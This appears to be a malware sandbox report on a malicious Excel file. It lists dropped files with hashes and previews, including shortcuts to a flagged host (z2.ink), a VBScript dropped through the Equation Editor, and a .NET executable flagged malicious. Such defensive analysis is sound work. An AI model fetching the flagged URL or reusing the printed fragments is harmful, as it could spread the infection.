                                Entropy (8bit):1.3870145383915669
                                Encrypted:false
                                SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                MD5:1623709C6B2FB813984B1265C26A85F1
                                SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                Malicious:false
                                Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\explorer.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                Category:dropped
                                Size (bytes):77824
                                Entropy (8bit):1.133993246026424
                                Encrypted:false
                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                Malicious:false
                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview:1
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):131072
                                Entropy (8bit):0.025598779265530825
                                Encrypted:false
                                SSDEEP:6:I3DPcNHvxggLRQ3whtH/tK4FRXv//4tfnRujlw//+GtluJ/eRuj:I3DPWuw7H/DvYg3J/
                                MD5:E1EBBC491E520A12D9167CB09D886219
                                SHA1:2A67881B5511B4951635E18C6BB44E4E0ABAF582
                                SHA-256:E956E79A679AF35231E63C5DC56BB39EF807605D3C2460A5333E7E1AA5DC7855
                                SHA-512:AC56CE379C9777DEFCFD1BD67AD4C208F7D8B35EEE3F68C915B47DD10B321200B1C4725124EFE50CEAC4686E225454770E2955F55B04A1BEB08375FB54556EEF
                                Malicious:false
                                Preview:......M.eFy...z.r8...hI.%.:.F.*S,...X.F...Fa.q..................................ME.>r.4b.S............W..C.u.I........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):131072
                                Entropy (8bit):0.025489576099554927
                                Encrypted:false
                                SSDEEP:6:I3DPcUgVdNHvxggLRZyMKRkzRXv//4tfnRujlw//+GtluJ/eRuj:I3DPPcZVZikFvYg3J/
                                MD5:2F72DE8B99DDAFDFEA8A652A5257DD46
                                SHA1:A632AAC16825ADFDF74CF679CF0A0A77C23772BC
                                SHA-256:1519550BC10AC56E8433B05EB9EABB87183A9C4675780615405BC51BE7A7BA14
                                SHA-512:4AF4FBBA406D37DE4A3867B4EA30F8026CE0B5EBA98C9BB65E8E3631722CF07C50B0AC7AFC26F39F4F232753CBF87081800E87AA732E7BBF639330C9AF8F8491
                                Malicious:false
                                Preview:......M.eFy...z...q._K@.Z..[.h.S,...X.F...Fa.q..............................q..GrA.V.A./.........*.&>..?I.h..@e.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):16384
                                Entropy (8bit):0.7337903993574023
                                Encrypted:false
                                SSDEEP:24:7ZgYcoQoHmewekjYh+0p2Ezkofurju0F/GuguGFhhzoP7o9RIS:7ZYnJ8h+iGu0FxguGFzg7I
                                MD5:D58AEAA1D5FF6ECC633D638F98B4462F
                                SHA1:A730826D3732818430BF0E64156A82D24AC2BF97
                                SHA-256:DA36CF12EC1C660B54B5D2F00690A00CCBD4E62613FD7A60A62F1295C1BCDDDE
                                SHA-512:1C5A916B00E1B76C9AA44744A9BC9E219EE7FFD6D667D3D0D13FFD5BE7D63FD263A04F20152123964EB33BD17C716CA8AC12CC7949E5F70F61E35721A139A891
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):512
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3::
                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                Malicious:false
                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):512
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3::
                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                Malicious:false
                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:Generic INItialization configuration [xls]
                                Category:modified
                                Size (bytes):60
                                Entropy (8bit):4.450489295854282
                                Encrypted:false
                                SSDEEP:3:bD9SW4LZX/UYCmMTBCv:b5SZZX+T2
                                MD5:5E6D32092B8E053B991BB6EC94B9573D
                                SHA1:A2FB2F6C4372AFB1981FFE2A992A3EAF29D4DE15
                                SHA-256:0CB7C650D453DF299AA15C67A88F98CD47253A5837073DF2F1AD629C1977D766
                                SHA-512:DF91AB1A03222D4D3A9B5190A000207CD3E39BCB2A2CF9671590D62F89F298B19874596B9BD450E93B8FE9691AC616A5DE840054187F82CCC0DBE2474A888C66
                                Malicious:false
                                Preview:[folders]..zBOD.url=0..z2.ink.url=0...LNK=0..[xls]...LNK=0..
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:MS Windows 95 Internet shortcut text (URL=<http://z2.ink/>), ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):4.446439344671015
                                Encrypted:false
                                SSDEEP:3:HRAbABGQYm/5XG8n:HRYFVm/5XJn
                                MD5:7F1FACEA6A36B544AC585A5173C32BBC
                                SHA1:2B9A9BA3C87CEF7C19ED56EEBA30731D250D4726
                                SHA-256:2A4741F9C5EDC7138E16555F591135B3258319D3DFF94D7864AF06AB73E66262
                                SHA-512:16E1F8B87EF5D39867FF4B82D4F472EA059680C3344FFEF3F033F6410F9FA0D6626FB16E43DC041AB56606EBEFFC444D3CCC088581C18038DC32A9BC7318E41A
                                Malicious:true
                                Preview:[InternetShortcut]..URL=http://z2.ink/..
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:MS Windows 95 Internet shortcut text (URL=<http://z2.ink/zBOD>), ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):44
                                Entropy (8bit):4.61807820934971
                                Encrypted:false
                                SSDEEP:3:HRAbABGQYm/5XGx:HRYFVm/5X4
                                MD5:1E88E817D8E86C4FC443EBE5C8A7A92C
                                SHA1:936F00F64319F341C5B76D33FE1F380EDF97C065
                                SHA-256:61C10E884582D69B2D7CF8E232FE132E7343B75F2EC125E47CA7C8E4C80512AA
                                SHA-512:5DE4EB63257F640739B4BE0123E605EC41AEBB79D876E534D5B2BFEE4160DC126395691A5519784E4557E3E53E2589F37027BE3F208CC705AD4ACB9830EF1798
                                Malicious:true
                                Preview:[InternetShortcut]..URL=http://z2.ink/zBOD..
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.503835550707525
                                Encrypted:false
                                SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                                MD5:CB3D0F9D3F7204AF5670A294AB575B37
                                SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                                SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                                SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                                Malicious:false
                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):157620
                                Entropy (8bit):3.266773697155131
                                Encrypted:false
                                SSDEEP:1536:IKVd99CObiBKMcZGtaJK6nbsPhwW0/5JJ7i1cCsg0BRbUZlu9gISsRf:NVdMqJK67/Kczg0BRcY
                                MD5:2A72DDE2D0CAE1D60A1E9B1795350C62
                                SHA1:1AB2FEF7BD875D6A92CA83B77A26255DF2E10EAF
                                SHA-256:33FAFF24C68095E9ED702732BDDFE647E885533D37E6C1090CB19DA13C64A976
                                SHA-512:0EDB935A63E3ABA4D585143FD775C513157AAC397EDD81BD109BBEA6C7C3808627D24D7DA6D6F4E789572514A212F200F78750DE9564B094DD71AACF425C3132
                                Malicious:true
                                Preview:......F.u.n.c.t.i.o.n. .W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e.(.d.t.m.E.v.e.n.t.D.a.t.e.).........W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e. .=. .C.D.a.t.e.(.M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .5.,. .2.). .&. ."./.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .7.,. .2.). .&. ."./.". .&. .L.e.f.t.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .4.). ._.....&. .". .". .&. .M.i.d. .(.d.t.m.E.v.e.n.t.D.a.t.e.,. .9.,. .2.). .&. .".:.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .1.1.,. .2.). .&. .".:.". .&. .M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. ._.....1.3.,. .2.).).........E.n.d. .F.u.n.c.t.i.o.n.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....F.u.n.c.t.i.o.n. .g.e.t.D.e.s.c.r.i.p.t.i.o.n.(.s.t.
                                Process:C:\Windows\explorer.exe
                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):64704
                                Entropy (8bit):6.02370063609959
                                Encrypted:false
                                SSDEEP:768:f8XcJiMjm2ieHlPyCsSuJbn8dBhFRHSMM6Iq8HSYDKJENf+i6CBpTX:TYMaNylPYSAb8dBnhHr4DKKNf+GBp
                                MD5:8FE9545E9F72E460723F484C304314AD
                                SHA1:3718A40FFC3AF2613B8B5FE41C475D85FF0522F4
                                SHA-256:D2F0B87E2D2707685C4D35F8F05B42FB8326EF4E70D16097B8837DABA06AC961
                                SHA-512:0738526EB2E6C485528C6B5A8DDABB51F095C134E010F9F3F25F341ABBE7A63072B0E2C2B161713D28B93F2A33C1476A0FED2D64FF86C9547DA9AF34DC90529A
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Joe Sandbox View:
                                • Filename: #20240627_Edlen_A.xls, Detection: malicious, Browse
                                • Filename: Requirements.xla.xlsx, Detection: malicious, Browse
                                • Filename: vns.exe, Detection: malicious, Browse
                                • Filename: Doc606112.xls, Detection: malicious, Browse
                                • Filename: SWIFT26794306.xlam.xlsx, Detection: malicious, Browse
                                • Filename: Enquiry#234342.xlam.xlsx, Detection: malicious, Browse
                                • Filename: Profoma.xls, Detection: malicious, Browse
                                • Filename: Scan_doc000680092112202023130.xlam.xlsx, Detection: malicious, Browse
                                • Filename: SecuriteInfo.com.Win32.RansomX-gen.23647.22068.exe, Detection: malicious, Browse
                                • Filename: e-Profile.js, Detection: malicious, Browse
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...pn.\..............0.............^.... ........@.. ....................... ............`.....................................O.......8................>........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                Process:C:\Windows\explorer.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):339146
                                Entropy (8bit):7.9994598443987135
                                Encrypted:true
                                SSDEEP:6144:upKljPiUGxnSO5u8cimwevw560/gXW4HUrr85GJm0n9eE9/7zBNfZQ:u2GxSOAvs4HCr8e979zLe
                                MD5:E23E067B88551F314FB3EA02C5657B0E
                                SHA1:4FB9A3B990E9AB415E56DEA042AEC5633CB6D444
                                SHA-256:4ED8F97F1B86101728DAA99BA5307373E2BEBF00BD7A97899FE1A98FA74228C3
                                SHA-512:82EC3E73665BF2A01E2124FE8305C1A86E2B2D4CF06DE8979098D243ACCD121B51B89DC3D63D71BA9D05D9C5FA60E452F2E7B139DA6FBBEF75A7B1694DADF7D3
                                Malicious:false
                                Preview:.p.P.%.2.f...b*.=..~.mE(U2......tE...Wq.u.B....0.>.a=i.v....O.a..3v..D..........U#...*.c.k....V.U...{.[..HX.W.Gg...tT:...?.lj~..Q........OLE.^..N.Z..d.t...$.....>..;t.L..........|..]6>.(..........iq....\....k...aHa....K.^..+*..%;/~..nC?.=,..q-.C_..W1~...71.d.HD$..nL.G..."..tQ....u=...S..O..u..@.......=..n&..C..U.2y ...(......9..q...{...p.].y...}6O....e\...G#[ng.v.G...w..Gu/..//../a.h...M..N;.d.UR.......z......d..\a...K...v...a..<}.u.@..u..,(e/...U".....~s..J....H.B.F]n.>.....V0>...%Z.TLG..X.!....:.7.*.b.$.UHW..................J....{K.....v..3..Y.nX...Sc..uB.l....-S.r1.N(.V..T....>..h........ypVJN.^...R..Z.i./%..yhA.v.|g<.Q...U. ...E.n..jQ....D.....Al..(.s..&_.A.\........:h.......A...OT.".:7.E.9V......'OCo..X..GN........Z.. .[W+...a..8B.+y..l.....%4H],)_.W...t...d.4.?m........wU..P.....1e.....d.].h.m..jg.&..e....og...,B.oQ.M.P{...Z..!8..y......X..&6P.....D...]...W..Nl.f...!$KD.[3.Y../..*....:.?V%....]...7...?.+_-..=..Ls....U.I._.
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue May 28 08:30:32 2024, Security: 1
                                Category:dropped
                                Size (bytes):306688
                                Entropy (8bit):7.963025200312596
                                Encrypted:false
                                SSDEEP:6144:n0W8PVgKBBIy401aOh95xeT5h1v+KAn3EV70WAaN7j0CTdCLk4E1axF1Krv:0W89rBs0lVedh4KAwAYj/TkQ4NxF1KD
                                MD5:85E26498D11F0EB0EE36E96F51E75B64
                                SHA1:B3EF4FAC6662D3A44EAB8690D10FD845FD311BD7
                                SHA-256:7483F6FB6E3D21149FDD072D3F286243DACA80C70A048D0947DCB078D131F1DF
                                SHA-512:B3D31FF0CE5FE454CD0173464933F0DCF4AD4264817B497EC215846259E95CF53633D788E8926526102823E9FA7AC4988D75733E8555C18AB78A6D4F04DB40B4
                                Malicious:false
                                Preview:......................>...................................!...................c.......e...............................................................................................................................................................................................................................................................................................................................................................................................................................................U................................................................................................................... ...........T...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...d.......e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue May 28 08:30:32 2024, Security: 1
                                Category:dropped
                                Size (bytes):306688
                                Entropy (8bit):7.963025200312596
                                Encrypted:false
                                SSDEEP:6144:n0W8PVgKBBIy401aOh95xeT5h1v+KAn3EV70WAaN7j0CTdCLk4E1axF1Krv:0W89rBs0lVedh4KAwAYj/TkQ4NxF1KD
                                MD5:85E26498D11F0EB0EE36E96F51E75B64
                                SHA1:B3EF4FAC6662D3A44EAB8690D10FD845FD311BD7
                                SHA-256:7483F6FB6E3D21149FDD072D3F286243DACA80C70A048D0947DCB078D131F1DF
                                SHA-512:B3D31FF0CE5FE454CD0173464933F0DCF4AD4264817B497EC215846259E95CF53633D788E8926526102823E9FA7AC4988D75733E8555C18AB78A6D4F04DB40B4
                                Malicious:false
                                Preview:......................>...................................!...................c.......e...............................................................................................................................................................................................................................................................................................................................................................................................................................................U................................................................................................................... ...........T...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...d.......e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):26
                                Entropy (8bit):3.95006375643621
                                Encrypted:false
                                SSDEEP:3:ggPYV:rPYV
                                MD5:187F488E27DB4AF347237FE461A079AD
                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                Malicious:false
                                Preview:[ZoneTransfer]....ZoneId=0
                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun May 26 18:33:34 2024, Security: 1
                                Entropy (8bit):7.907575312418956
                                TrID:
                                • Microsoft Excel sheet (30009/1) 47.99%
                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                File name:#20240627_Edlen_B.xls
                                File size:314'880 bytes
                                MD5:c3dc8fb22795f4efb58e63c8f2110561
                                SHA1:97e7c1949993ce9246baf1bb5c9d4f34020435f4
                                SHA256:3df16653affd5ddd6a27c4b9a4e92aa3e4b87fc61b4332b7c9675ba1cfc8a70f
                                SHA512:7f5633732e074b9439bacbf0c9704e80c9bd5e4df97e734cc0026841ed54a630fb4e319869180fa1ee37031995aa45bc97842d81fe7ea21f4e0753320fc4193b
                                SSDEEP:6144:q0W8ZkNBZGbxdEKPdQEUD5rvPGW+Z0a42hULbREiMg:FW8qNnSdEkO9rvPB8jKZ
                                TLSH:2F64130A32C09123CC9A58785EFDE3C69B72FD528F15E25B78E0B79D8D326415B9306E
                                File Content Preview:........................>...................................!...................d.......f......................................................................................................................................................................
                                Icon Hash:276ea3a6a6b7bfbf
                                Document Type:OLE
                                Number of OLE Files:1
                                Has Summary Info:
                                Application Name:Microsoft Excel
                                Encrypted Document:True
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:True
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:False
                                Flash Objects Count:0
                                Contains VBA Macros:True
                                Code Page:1252
                                Author:
                                Last Saved By:
                                Create Time:2006-09-16 00:00:00
                                Last Saved Time:2024-05-26 17:33:34
                                Creating Application:Microsoft Excel
                                Security:1
                                Document Code Page:1252
                                Thumbnail Scaling Desired:False
                                Contains Dirty Links:False
                                Shared Document:False
                                Changed Hyperlinks:False
                                Application Version:786432
                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                VBA File Name:Sheet1.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e9 9e 62 eb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet1"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                VBA File Name:Sheet2.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t - . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e9 9e 74 2d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet2"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                VBA File Name:Sheet3.cls
                                Stream Size:977
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 e9 9e fb 00 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                Attribute VB_Name = "Sheet3"
                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                Attribute VB_GlobalNameSpace = False
                                Attribute VB_Creatable = False
                                Attribute VB_PredeclaredId = True
                                Attribute VB_Exposed = True
                                Attribute VB_TemplateDerived = False
                                Attribute VB_Customizable = True
                                

                                General
                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                VBA File Name:ThisWorkbook.cls
                                Stream Size:985
